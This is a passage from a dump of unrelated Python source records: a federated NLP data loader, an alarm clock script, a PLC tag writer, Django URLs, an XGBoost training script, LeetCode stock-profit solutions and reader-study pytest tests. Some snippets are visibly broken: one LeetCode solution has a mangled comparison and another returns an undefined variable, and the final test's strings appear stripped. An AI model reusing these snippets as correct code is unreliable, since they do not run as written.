args.partition_file_path,\n \"partition_method\": args.partition_method,\n \"dataset\": args.dataset,\n \"output_dir\": args.output_dir,\n \"is_debug_mode\": args.is_debug_mode,\n \"fedprox_mu\": args.fedprox_mu,\n }\n )\n\n # model_args.config[\"num_labels\"] = num_labels\n if args.model_type == \"bert\":\n tokenizer_class = BertTokenizer\n elif args.model_type == \"distilbert\":\n tokenizer_class = DistilBertTokenizer\n tokenizer = tokenizer_class.from_pretrained(\n args.model, do_lower_case=args.do_lower_case\n )\n preprocessor = TCPreprocessor(\n args=model_args, label_vocab=attributes[\"label_vocab\"], tokenizer=tokenizer\n )\n dm = TextClassificationDataManager(\n args, model_args, preprocessor, 0, args.client_num_per_round\n )\n\n (\n train_data_num,\n test_data_num,\n train_data_global,\n test_data_global,\n train_data_local_num_dict,\n train_data_local_dict,\n test_data_local_dict,\n num_clients,\n ) = dm.load_federated_data()\n\n if centralized:\n train_data_local_num_dict = {\n 0: sum(\n user_train_data_num\n for user_train_data_num in train_data_local_num_dict.values()\n )\n }\n train_data_local_dict = {\n 0: [\n batch\n for cid in sorted(train_data_local_dict.keys())\n for batch in train_data_local_dict[cid]\n ]\n }\n test_data_local_dict = {\n 0: [\n batch\n for cid in sorted(test_data_local_dict.keys())\n for batch in test_data_local_dict[cid]\n ]\n }\n args.client_num_in_total = 1\n\n if full_batch:\n train_data_global = combine_batches(train_data_global)\n test_data_global = combine_batches(test_data_global)\n train_data_local_dict = {\n cid: combine_batches(train_data_local_dict[cid])\n for cid in train_data_local_dict.keys()\n }\n test_data_local_dict = {\n cid: combine_batches(test_data_local_dict[cid])\n for cid in test_data_local_dict.keys()\n }\n args.batch_size = args_batch_size\n\n dataset = [\n train_data_num,\n test_data_num,\n train_data_global,\n test_data_global,\n train_data_local_num_dict,\n train_data_local_dict,\n test_data_local_dict,\n class_num,\n ]\n return dataset, class_num\n\n\ndef load_poisoned_dataset_from_edge_case_examples(args):\n return load_poisoned_dataset(args=args)\n\n\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--run_id\", type=int, default=0)\n\n parser.add_argument(\"--is_debug_mode\", default=0, type=int, help=\"is_debug_mode\")\n\n # Data related\n # TODO: list all dataset names:\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"20news\",\n metavar=\"N\",\n help=\"dataset used for training\",\n )\n\n parser.add_argument(\n \"--data_file_path\",\n type=str,\n default=\"/home/ubuntu/fednlp_data/data_files/20news_data.h5\",\n help=\"data h5 file path\",\n )\n\n parser.add_argument(\n \"--partition_file_path\",\n type=str,\n default=\"/home/ubuntu/fednlp_data/partition_files/20news_partition.h5\",\n help=\"partition h5 file path\",\n )\n\n parser.add_argument(\n \"--partition_method\", type=str, default=\"uniform\", help=\"partition method\"\n )\n\n # Model related\n parser.add_argument(\n \"--model_type\",\n type=str,\n default=\"bert\",\n metavar=\"N\",\n help=\"transformer model type\",\n )\n\n parser.add_argument(\n \"--model_class\",\n type=str,\n default=\"transformer\",\n metavar=\"N\",\n help=\"model class\",\n )\n\n parser.add_argument(\n \"--model\",\n type=str,\n default=\"bert-base-uncased\",\n metavar=\"N\",\n help=\"transformer model name\",\n )\n parser.add_argument(\n \"--do_lower_case\",\n type=bool,\n default=True,\n metavar=\"N\",\n help=\"transformer model name\",\n )\n\n # Learning related\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=8,\n metavar=\"N\",\n help=\"input batch size for training (default: 8)\",\n )\n parser.add_argument(\n \"--eval_batch_size\",\n type=int,\n default=8,\n metavar=\"N\",\n help=\"input batch size for evaluation (default: 8)\",\n )\n\n parser.add_argument(\n \"--max_seq_length\",\n type=int,\n default=128,\n metavar=\"N\",\n help=\"maximum sequence length (default: 128)\",\n )\n\n parser.add_argument(\n \"--n_gpu\", type=int, default=1, metavar=\"EP\", help=\"how many gpus will be used \"\n )\n\n parser.add_argument(\n \"--fp16\", default=False, action=\"store_true\", help=\"if enable fp16 for training\"\n )\n parser.add_argument(\n \"--random_seed\", type=int, default=42, metavar=\"N\", help=\"random seed\"\n )\n\n # IO related\n parser.add_argument(\n \"--output_dir\",\n type=str,\n default=\"/tmp/\",\n metavar=\"N\",\n help=\"path to save the trained results and ckpts\",\n )\n\n # Federated Learning related\n parser.add_argument(\n \"--federated_optimizer\",\n type=str,\n default=\"FedAvg\",\n help=\"Algorithm list: FedAvg; FedOPT; FedProx \",\n )\n\n parser.add_argument(\n \"--backend\", type=str, default=\"MPI\", help=\"Backend for Server and Client\"\n )\n\n parser.add_argument(\n \"--comm_round\",\n type=int,\n default=10,\n help=\"how many round of communications we shoud use\",\n )\n\n parser.add_argument(\n \"--is_mobile\",\n type=int,\n default=1,\n help=\"whether the program is running on the FedML-Mobile server side\",\n )\n\n parser.add_argument(\n \"--client_num_in_total\",\n type=int,\n default=-1,\n metavar=\"NN\",\n help=\"number of clients in a distributed cluster\",\n )\n\n parser.add_argument(\n \"--client_num_per_round\",\n type=int,\n default=4,\n metavar=\"NN\",\n help=\"number of workers\",\n )\n\n parser.add_argument(\n \"--epochs\",\n type=int,\n default=3,\n metavar=\"EP\",\n help=\"how many epochs will be trained locally\",\n )\n\n parser.add_argument(\n \"--gradient_accumulation_steps\",\n type=int,\n default=1,\n metavar=\"EP\",\n help=\"how many steps for accumulate the loss.\",\n )\n\n parser.add_argument(\n \"--client_optimizer\",\n type=str,\n default=\"adam\",\n help=\"Optimizer used on the client. This field can be the name of any subclass of the torch Opimizer class.\",\n )\n\n parser.add_argument(\n \"--learning_rate\",\n type=float,\n default=0.1,\n metavar=\"LR\",\n help=\"learning rate on the client (default: 0.001)\",\n )\n\n parser.add_argument(\n \"--weight_decay\", type=float, default=0, metavar=\"N\", help=\"L2 penalty\"\n )\n\n parser.add_argument(\n \"--clip_grad_norm\", type=int, default=0, metavar=\"N\", help=\"L2 penalty\"\n )\n\n parser.add_argument(\n \"--server_optimizer\",\n type=str,\n default=\"sgd\",\n help=\"Optimizer used on the server. This field can be the name of any subclass of the torch Opimizer class.\",\n )\n\n parser.add_argument(\n \"--server_lr\",\n type=float,\n default=0.1,\n help=\"server learning rate (default: 0.001)\",\n )\n\n parser.add_argument(\n \"--server_momentum\", type=float, default=0, help=\"server momentum (default: 0)\"\n )\n\n parser.add_argument(\n \"--fedprox_mu\", type=float, default=1, help=\"server momentum (default: 1)\"\n )\n\n parser.add_argument(\n \"--evaluate_during_training\",\n default=False,\n metavar=\"EP\",\n help=\"the frequency of the evaluation during training\",\n )\n\n parser.add_argument(\n \"--evaluate_during_training_steps\",\n type=int,\n default=100,\n metavar=\"EP\",\n help=\"the frequency of the evaluation during training\",\n )\n\n parser.add_argument(\n \"--frequency_of_the_test\",\n type=int,\n default=1,\n help=\"the frequency of the algorithms\",\n )\n\n # GPU device management\n parser.add_argument(\n \"--gpu_mapping_file\",\n type=str,\n default=\"gpu_mapping.yaml\",\n help=\"the gpu utilization file for servers and clients. If there is no \\\n gpu_util_file, gpu will not be used.\",\n )\n\n parser.add_argument(\n \"--gpu_mapping_key\",\n type=str,\n default=\"mapping_default\",\n help=\"the key in gpu utilization file\",\n )\n\n parser.add_argument(\"--ci\", type=int, default=0, help=\"CI\")\n\n # cached related\n parser.add_argument(\n \"--reprocess_input_data\", action=\"store_true\", help=\"whether generate features\"\n )\n\n # freeze related\n parser.add_argument(\n \"--freeze_layers\", type=str, default=\"\", metavar=\"N\", help=\"freeze which layers\"\n )\n args = parser.parse_args(\"\")\n args.formulation = \"classification\"\n dataset, class_num = load(args)\n","sub_path":"python/app/fednlp/text_classification/data/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":13276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"200614736","text":"import sys\nimport time\nimport winsound\nfrom datetime import datetime\n\n\ndef input_alarm_time():\n \"\"\"\n 標準入力からアラーム時刻を取得する\n\n @return datetime.datetime アラーム時刻\n \"\"\"\n\n while True:\n now = datetime.now()\n print(f'現在の時刻 {now.hour:02d}:{now.minute:02d}')\n\n try:\n hm = input('アラーム時刻 (H:M) > ')\n except EOFError as e:\n raise e\n except KeyboardInterrupt:\n sys.exit(1)\n \n try:\n alarm_time = datetime.strptime(hm, '%H:%M')\n except ValueError:\n print('不正な時刻です', file=sys.stderr)\n continue\n \n break\n\n return alarm_time\n\n\ndef alarm_time_to_seconds(at, now):\n \"\"\"\n アラーム時刻を現在の時刻からの経過秒数に変換する\n\n @param datetime.datetime at セットされたアラーム時刻\n @param datetime.datetime now 現在の時刻\n\n @return int 秒数\n \"\"\"\n\n h24secs = 24*60*60\n atsecs = at.hour*60*60 + at.minute*60\n nowsecs = now.hour*60*60 + now.minute*60\n\n if atsecs >= nowsecs:\n secs = atsecs - nowsecs\n else:\n secs = atsecs + (h24secs - nowsecs)\n \n return secs - now.second\n\n\ndef wait(seconds):\n \"\"\"\n 引数の秒数だけ時間が経過するのを待つ\n\n @param int seconds 秒数\n \"\"\"\n\n try:\n for _ in range(seconds):\n now = datetime.now()\n print(f'\\r{now.hour:02d}:{now.minute:02d}:{now.second:02d}', end='')\n time.sleep(1)\n\n print()\n except KeyboardInterrupt as e:\n raise e\n\n\ndef alarm():\n \"\"\"\n アラームを発動する\n \"\"\"\n\n print('アラーム中') \n winsound.PlaySound('sound.wav', winsound.SND_FILENAME | winsound.SND_LOOP | winsound.SND_ASYNC)\n\n try:\n input('停止するには何かキーを押してください')\n except EOFError:\n print()\n except KeyboardInterrupt:\n sys.exit(1)\n\n winsound.PlaySound(None, winsound.SND_PURGE)\n\n\ndef main():\n while True:\n # アラーム時刻の入力\n try:\n tm = input_alarm_time()\n except EOFError:\n break\n\n # 入力した時刻を、現在の時刻からの経過時間の秒数に変換する\n seconds = alarm_time_to_seconds(tm, datetime.now())\n\n # 秒数が経過するのを待つ\n try:\n wait(seconds)\n except KeyboardInterrupt:\n print()\n continue\n\n # アラーム発動\n alarm()\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126147924","text":"from clientcomm_v1 import *\nfrom opcua import ua\nimport pandas as pd\nimport time\n\n__all__ = ['WriteGeneral']\n\n\n\nclass WriteGeneral():\n\n def __init__(self, client):\n self.client = client\n self.mylock = threading.Lock()\n\n # def write_tagmodifier(func):\n # def inner(self, tagname, setvalue):\n # browser_id = '7:' + tagname\n # return func(self, browser_id, setvalue)\n # return inner\n\n # @write_tagmodifier\n\n\n\n def readtagsymbol(self,tagname):\n n = 0\n while n < len(self.df.index):\n data = self.df.iloc[n, 1]\n if(data == tagname):\n byte = self.df.iloc[n, 3]\n bit = self.df.iloc[n, 4]\n datatype = self.df.iloc[n, 2]\n return byte,bit,datatype\n n = n + 1\n\n\n def writenodevalue(self, tagname, tagvalue):\n tag_id = str(tagname)\n self.df = pd.read_excel(r'C:\\OPCUA\\Working_VF1_5.xls', sheet_name='OPERATION')\n self.byte, self.bit, self.datatype = self.readtagsymbol(tagname)\n self.byte = int(self.byte)\n self.bit = int(self.bit)\n if self.datatype == 'S7WLBit':\n self.result = self.client.read_area(areas['PE'], 0, self.byte,S7WLBit )\n set_bool(self.result, 0, self.bit, tagvalue)\n elif self.datatype == 'S7WLByte' or self.datatype == 'S7WLWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_int(self.result, 0, tagvalue)\n elif self.datatype == 'S7WLReal':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_real(self.result, 0, tagvalue)\n elif self.datatype == 'S7WLDWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_dword(self.result, 0, tagvalue)\n self.client.write_area(areas['PE'], 0, self.byte, self.result)\n\n\n def writesymbolvalue(self, address, tagvalue, datatype):\n addressconverted = float(address)\n self.byte = int(addressconverted)\n self.bit = round((addressconverted - self.byte)*10)\n if datatype == 'S7WLBit':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_bool(self.result, 0, self.bit, tagvalue)\n elif datatype == 'S7WLByte' or datatype == 'S7WLWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_int(self.result, 0, tagvalue)\n elif datatype == 'S7WLReal':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_real(self.result, 0, tagvalue)\n elif datatype == 'S7WLDWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_dword(self.result, 0, tagvalue)\n self.client.write_area(areas['PE'], 0, self.byte, self.result)\n\n def writeDBvalue(self, address, tagvalue, datatype, dataarea):\n addressconverted = float(address)\n self.byte = int(addressconverted)\n self.bit = round((addressconverted - self.byte) * 10)\n self.dataarea = int(dataarea)\n\n if datatype == 'S7WLBit':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_bool(self.result, 0, self.bit, tagvalue)\n elif datatype == 'S7WLByte' or datatype == 'S7WLWord':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_int(self.result, 0, tagvalue)\n elif datatype == 'S7WLReal':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_real(self.result, 0, tagvalue)\n elif datatype == 'S7WLDWord':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_dword(self.result, 0, tagvalue)\n self.client.write_area(areas['DB'], self.dataarea, self.byte, self.result)\n\n def __getstate__(self):\n state = self.__dict__.copy()\n # Remove the unpicklable entries.\n del state['mylock']\n return state\n # try:\n # covertvalue = 0\n # var = self.plcname.get_child(tagname)\n #\n # value = var.get_value()\n #\n # variantType = var.get_data_type_as_variant_type()\n #\n # if str(variantType) == \"VariantType.Float\":\n # covertvalue = float(setvalue)\n #\n # else:\n # covertvalue = int(setvalue)\n #\n # dv = ua.DataValue(ua.Variant(covertvalue, variantType))\n #\n # var.set_value(dv)\n # return True\n # except Exception as e:\n # print(\"WRITE GENERAL ERROR IS :\",e.args)\n #\n # def __getstate__(self):\n # state = self.__dict__.copy()\n # # Remove the unpicklable entries.\n # del state['mylock']\n # return state\n #\n # # def __setstate__(self, state):\n # # # Restore instance attributes.\n # # self.__dict__.update(state)\n\n\n\n\n\n\n\n\n\n\n# Finall output\n\n# def final_output():\n# comm = Communication()\n# client = comm.opc_client_connect()\n# if client :\n# tag_name = str(input(\"please enter the tag name :\"))\n# writegenral = WriteGeneral(comm.PLC)\n# writegenral.writenodevalue(tag_name,1)\nif __name__ == \"__main__\":\n import general\n from snap7 import client as c\n comm_object = general.General()\n comm_object.writegeneral.writesymbolvalue('4.6',1,'S7WLBit')\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"CASTERSIMULATION/Common/.idea/writegeneral_v2.py","file_name":"writegeneral_v2.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435295740","text":"\"\"\"urlpatterns for productratings. Note that you do not need to add these to your urls anywhere, they'll be automatically added by the collect_urls signals.\"\"\"\nfrom django.conf import settings\nfrom django.urls import re_path, include\n\nfrom satchmo_ext.productratings.views import BestratingsListView\nimport logging\n\nlog = logging.getLogger('productratings.urls')\n\nproductpatterns = [\n re_path(r'^view/bestrated/$', BestratingsListView.as_view(), name='satchmo_product_best_rated'),\n]\n\n# Override comments with our redirecting view. You can remove the next two\n# URLs if you aren't using ratings.\n# (r'^comments/post/$', 'comments.post_rating', {'maxcomments': 1 }, 'satchmo_rating_post'),\nif 'django_comments' in settings.INSTALLED_APPS:\n comment_urls = 'django_comments.urls'\nelse:\n comment_urls = 'django.contrib.comments.urls'\n\ncommentpatterns = [\n re_path(r'^comments/', include(comment_urls)),\n]\n\n\ndef add_product_urls(sender, patterns=(), section=\"\", **kwargs):\n if section == \"product\":\n log.debug('adding ratings urls')\n patterns += productpatterns\n\n\ndef add_comment_urls(sender, patterns=(), **kwargs):\n log.debug('adding comments urls')\n patterns += commentpatterns\n","sub_path":"satchmo/apps/satchmo_ext/productratings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"201555589","text":"from recruit.feat2 import *\nimport datetime\nfrom tqdm import tqdm\nimport lightgbm as lgb\nfrom sklearn.cross_validation import KFold\nfrom sklearn.metrics import mean_squared_error\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error\n\n\ntrain_feat = pd.DataFrame()\nstart_date = '2017-01-29'\nfor i in range(20):\n train_feat_sub = make_feats(date_add_days(start_date, i*(-7)),39)\n train_feat = pd.concat([train_feat,train_feat_sub])\nfor i in range(1,6):\n train_feat_sub = make_feats(date_add_days(start_date,i*(7)),42-(i*7))\n train_feat = pd.concat([train_feat,train_feat_sub])\neval_feat = make_feats(date_add_days(start_date, 42),39)\n\n# lbl = LabelEncoder()\n# lbl.fit(list(train_feat['store_id'].values) + list(eval_feat['store_id'].values) + list(test_feat['store_id'].values))\n# train_feat['store_id'] = lbl.transform(train_feat['store_id'].values)\n# eval_feat['store_id'] = lbl.transform(eval_feat['store_id'].values)\n# test_feat['store_id'] = lbl.transform(test_feat['store_id'].values)\n# lbl.fit(list(train_feat['air_area_name'].values) + list(eval_feat['air_area_name'].values) + list(test_feat['air_area_name'].values))\n# train_feat['air_area_name'] = lbl.transform(train_feat['air_area_name'].values)\n# eval_feat['air_area_name'] = lbl.transform(eval_feat['air_area_name'].values)\n# test_feat['air_area_name'] = lbl.transform(test_feat['air_area_name'].values)\n\npredictors = [f for f in eval_feat.columns if f not in (['id','store_id','visit_date','end_date','air_area_name','visitors'])]\n\nparams = {'booster': 'gbtree',\n 'objective': 'reg:linear',\n 'eval_metric': 'rmse',\n 'max_depth': 5,\n 'lambda': 5,\n 'subsample': 0.8,\n 'colsample_bytree': 0.7,\n 'min_child_weight': 10, # 8~10\n 'eta': 0.05,\n 'seed': 66,\n # 'nthread':12\n }\n\nt0 = time.time()\nxgb_train = xgb.DMatrix(train_feat[predictors], train_feat['visitors'])\nxgb_eval = xgb.DMatrix(eval_feat[predictors], eval_feat['visitors'])\n\nwatchlist = [(xgb_train, 'train'), (xgb_eval, 'val')]\nmodel = xgb.train(params,\n xgb_train,\n 1000,\n evals=watchlist,\n verbose_eval=20,\n early_stopping_rounds=20)\nxgb_eval_pred = model.predict(xgb_eval)\nprint('线下的得分:{}'.format(mean_squared_error(eval_feat['visitors'],xgb_eval_pred)**0.5))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"recruit/xgb_eval.py","file_name":"xgb_eval.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560680879","text":"# Best Time to Buy and Sell Stock\n#initial Brute force approach I did\n#Time comp O(n2) and breached time limit\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n maxp=0\n pro=0\n for x in range(len(prices)):\n for y in range(x,len(prices)):\n if(prices[y]>prices[x]):\n pro =prices[y]-prices[x]\n if(pro>maxp):\n maxp=pro\n \n return maxpro\n\n\n\n\n\n\n\n\n#Best appraoch with time comp O(n) with only one for loop, learnt from editorial\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n maxp=0\n minp=sys.maxsize\n for x in range(len(prices)):\n if(prices[x]maxp):\n maxp = prices[x]-minp\n \n return maxp\n \n \n \n","sub_path":"Best Time to Buy and Sell Stock.py","file_name":"Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"40886418","text":"import pytest\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError\nfrom django_capture_on_commit_callbacks import capture_on_commit_callbacks\n\nfrom grandchallenge.reader_studies.models import Answer, Question, ReaderStudy\nfrom tests.factories import ImageFactory, UserFactory\nfrom tests.reader_studies_tests.factories import (\n AnswerFactory,\n QuestionFactory,\n ReaderStudyFactory,\n)\nfrom tests.utils import get_view_for_user\n\n\n@pytest.mark.django_db\ndef test_group_deletion():\n rs = ReaderStudyFactory()\n readers_group = rs.readers_group\n editors_group = rs.editors_group\n\n assert readers_group\n assert editors_group\n\n ReaderStudy.objects.filter(pk__in=[rs.pk]).delete()\n\n with pytest.raises(ObjectDoesNotExist):\n readers_group.refresh_from_db()\n\n with pytest.raises(ObjectDoesNotExist):\n editors_group.refresh_from_db()\n\n\n@pytest.mark.django_db\n@pytest.mark.parametrize(\"group\", [\"readers_group\", \"editors_group\"])\ndef test_group_deletion_reverse(group):\n rs = ReaderStudyFactory()\n readers_group = rs.readers_group\n editors_group = rs.editors_group\n\n assert readers_group\n assert editors_group\n\n getattr(rs, group).delete()\n\n with pytest.raises(ObjectDoesNotExist):\n readers_group.refresh_from_db()\n\n with pytest.raises(ObjectDoesNotExist):\n editors_group.refresh_from_db()\n\n with pytest.raises(ObjectDoesNotExist):\n rs.refresh_from_db()\n\n\n@pytest.mark.django_db\ndef test_read_only_fields():\n rs = ReaderStudyFactory()\n q = QuestionFactory(reader_study=rs)\n\n assert q.is_fully_editable is True\n assert q.read_only_fields == []\n\n AnswerFactory(question=q, answer=\"true\")\n\n assert q.is_fully_editable is False\n assert q.read_only_fields == [\n \"question_text\",\n \"answer_type\",\n \"image_port\",\n \"required\",\n ]\n\n\n@pytest.mark.django_db\ndef test_generate_hanging_list():\n rs = ReaderStudyFactory()\n im1 = ImageFactory(name=\"im1\")\n im2 = ImageFactory(name=\"im2\")\n\n rs.generate_hanging_list()\n assert rs.hanging_list == []\n\n rs.images.set([im1, im2])\n rs.generate_hanging_list()\n assert rs.hanging_list == [\n {\"main\": \"im1\"},\n {\"main\": \"im2\"},\n ]\n\n\n@pytest.mark.django_db\ndef test_progress_for_user(settings):\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = ReaderStudyFactory()\n im1, im2 = ImageFactory(name=\"im1\"), ImageFactory(name=\"im2\")\n q1, q2, q3 = [\n QuestionFactory(reader_study=rs),\n QuestionFactory(reader_study=rs),\n QuestionFactory(reader_study=rs),\n ]\n\n reader = UserFactory()\n rs.add_reader(reader)\n\n question_perc = 100 / 6\n\n assert rs.get_progress_for_user(reader) == {\n \"diff\": 0.0,\n \"hangings\": 0.0,\n \"questions\": 0.0,\n }\n\n rs.images.set([im1, im2])\n rs.hanging_list = [{\"main\": im1.name}, {\"main\": im2.name}]\n rs.save()\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == 0\n\n a11 = AnswerFactory(question=q1, answer=\"foo\", creator=reader)\n a11.images.add(im1)\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == pytest.approx(question_perc)\n\n a21 = AnswerFactory(question=q1, answer=\"foo\", creator=reader)\n a21.images.add(im2)\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == pytest.approx(question_perc * 2)\n\n a12 = AnswerFactory(question=q2, answer=\"foo\", creator=reader)\n a12.images.add(im1)\n a13 = AnswerFactory(question=q3, answer=\"foo\", creator=reader)\n a13.images.add(im1)\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 50\n assert progress[\"questions\"] == pytest.approx(question_perc * 4)\n\n editor = UserFactory()\n rs.add_reader(editor)\n rs.add_editor(editor)\n\n for q in [q1, q2, q3]:\n for im in [im1, im2]:\n a = AnswerFactory(\n question=q, answer=\"foo\", creator=editor, is_ground_truth=True\n )\n a.images.add(im)\n\n progress = rs.get_progress_for_user(editor)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == 0\n\n for q in [q1, q2, q3]:\n for im in [im1, im2]:\n a = AnswerFactory(\n question=q, answer=\"foo\", creator=editor, is_ground_truth=False\n )\n a.images.add(im)\n\n progress = rs.get_progress_for_user(editor)\n assert progress[\"hangings\"] == 100.0\n assert progress[\"questions\"] == 100.0\n\n\n@pytest.mark.django_db # noqa: C901\ndef test_leaderboard(reader_study_with_gt, settings): # noqa: C901\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = reader_study_with_gt\n r1, r2 = rs.readers_group.user_set.all()\n e = rs.editors_group.user_set.first()\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n ans = AnswerFactory(question=question, creator=r1, answer=True)\n ans.images.add(im)\n\n leaderboard = rs.leaderboard\n assert Answer.objects.filter(is_ground_truth=False).count() == 6\n assert leaderboard[\"question_count\"] == 6.0\n scores = leaderboard[\"grouped_scores\"]\n assert len(scores) == 1\n user_score = scores[0]\n assert user_score[\"creator__username\"] == r1.username\n assert user_score[\"score__sum\"] == 6.0\n assert user_score[\"score__avg\"] == 1.0\n\n with capture_on_commit_callbacks(execute=True):\n for i, question in enumerate(rs.questions.all()):\n for j, im in enumerate(rs.images.all()):\n ans = AnswerFactory(\n question=question, creator=r2, answer=(i + j) % 2 == 0\n )\n ans.images.add(im)\n\n del rs.scores_by_user\n del rs.leaderboard\n leaderboard = rs.leaderboard\n assert Answer.objects.filter(is_ground_truth=False).count() == 12\n assert leaderboard[\"question_count\"] == 6.0\n scores = leaderboard[\"grouped_scores\"]\n assert len(scores) == 2\n for user_score in scores:\n if user_score[\"creator__username\"] != r2.username:\n continue\n assert user_score[\"score__sum\"] == 3.0\n assert user_score[\"score__avg\"] == 0.5\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n ans = AnswerFactory(question=question, creator=e, answer=True)\n ans.images.add(im)\n\n del rs.scores_by_user\n del rs.leaderboard\n leaderboard = rs.leaderboard\n assert Answer.objects.filter(is_ground_truth=False).count() == 18\n assert leaderboard[\"question_count\"] == 6.0\n scores = leaderboard[\"grouped_scores\"]\n assert len(scores) == 3\n for user_score in scores:\n if user_score[\"creator__username\"] != e.username:\n continue\n assert user_score[\"score__sum\"] == 6.0\n assert user_score[\"score__avg\"] == 1.0\n\n\n@pytest.mark.django_db # noqa - C901\ndef test_statistics(reader_study_with_gt, settings):\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = reader_study_with_gt\n r1, r2 = rs.readers_group.user_set.all()\n\n rs_questions = rs.questions.values_list(\"question_text\", flat=True)\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n ans = AnswerFactory(question=question, creator=r1, answer=True)\n ans.images.add(im)\n\n statistics = rs.statistics\n assert Answer.objects.filter(is_ground_truth=False).count() == 6\n assert statistics[\"max_score_questions\"] == 2.0\n scores = statistics[\"scores_by_question\"]\n assert len(scores) == rs.questions.count()\n questions = set(rs_questions)\n for score in scores:\n questions -= {score[\"question__question_text\"]}\n assert score[\"score__sum\"] == 2.0\n assert score[\"score__avg\"] == 1.0\n assert questions == set()\n\n scores = statistics[\"scores_by_case\"]\n assert len(scores) == rs.images.count()\n images = set(rs.images.values_list(\"name\", flat=True))\n for score in scores:\n images -= {score[\"images__name\"]}\n assert score[\"score__sum\"] == 3.0\n assert score[\"score__avg\"] == 1.0\n assert images == set()\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n answer = question.question_text == \"q1\" and im.name == \"im1\"\n ans = AnswerFactory(\n question=question, creator=r2, answer=answer\n )\n ans.images.add(im)\n\n del rs.statistics\n statistics = rs.statistics\n assert Answer.objects.filter(is_ground_truth=False).count() == 12\n assert statistics[\"max_score_cases\"] == 6.0\n scores = statistics[\"scores_by_question\"]\n assert len(scores) == rs.questions.count()\n questions = set(rs_questions)\n for score in scores:\n questions -= {score[\"question__question_text\"]}\n if score[\"question__question_text\"] == \"q1\":\n assert score[\"score__sum\"] == 3.0\n assert score[\"score__avg\"] == 0.75\n else:\n assert score[\"score__sum\"] == 2.0\n assert score[\"score__avg\"] == 0.5\n assert questions == set()\n\n assert sorted(statistics[\"questions\"]) == sorted(rs_questions)\n for im in rs.images.all():\n assert sorted(statistics[\"ground_truths\"][im.name].keys()) == sorted(\n rs_questions\n )\n\n\n@pytest.mark.django_db # noqa - C901\ndef test_score_for_user(reader_study_with_gt, settings):\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = reader_study_with_gt\n r1 = rs.readers_group.user_set.first()\n\n with capture_on_commit_callbacks(execute=True):\n for i, question in enumerate(rs.questions.all()):\n for j, im in enumerate(rs.images.all()):\n ans = AnswerFactory(\n question=question, creator=r1, answer=(i + j) % 2 == 0\n )\n ans.images.add(im)\n\n score = rs.score_for_user(r1)\n assert Answer.objects.filter(is_ground_truth=False).count() == 6\n assert score[\"score__sum\"] == 3.0\n assert score[\"score__avg\"] == 0.5\n\n\n@pytest.mark.django_db\ndef test_help_markdown_is_scrubbed(client):\n rs = ReaderStudyFactory(\n help_text_markdown=\"My Help Text\"\n )\n u = UserFactory()\n rs.add_reader(u)\n\n response = get_view_for_user(client=client, url=rs.api_url, user=u)\n\n assert response.status_code == 200\n assert response.json()[\"help_text\"] == \"

My Help Textnaughty

